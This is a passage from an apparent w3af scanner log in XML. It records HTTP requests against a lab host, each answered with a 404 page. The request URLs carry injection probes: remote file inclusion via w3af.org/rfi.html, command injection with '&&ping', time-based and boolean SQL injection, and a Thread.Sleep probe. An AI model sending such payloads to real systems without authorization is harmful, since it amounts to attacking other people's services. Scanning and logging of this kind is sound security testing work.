                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="539">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="540">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="547">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="549">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="604">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="622">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="696">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="704">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="761">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%22+OR+%2212%22%3D%2212 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="785">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%22+AND+%2212%22%3D%2213 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="794">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="800">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="805">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/yzzLwGYZ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="811">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%27+OR+%2712%27%3D%2712 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="830">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12%27+AND+%2712%27%3D%2713 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="848">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/3w0EFoHO HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
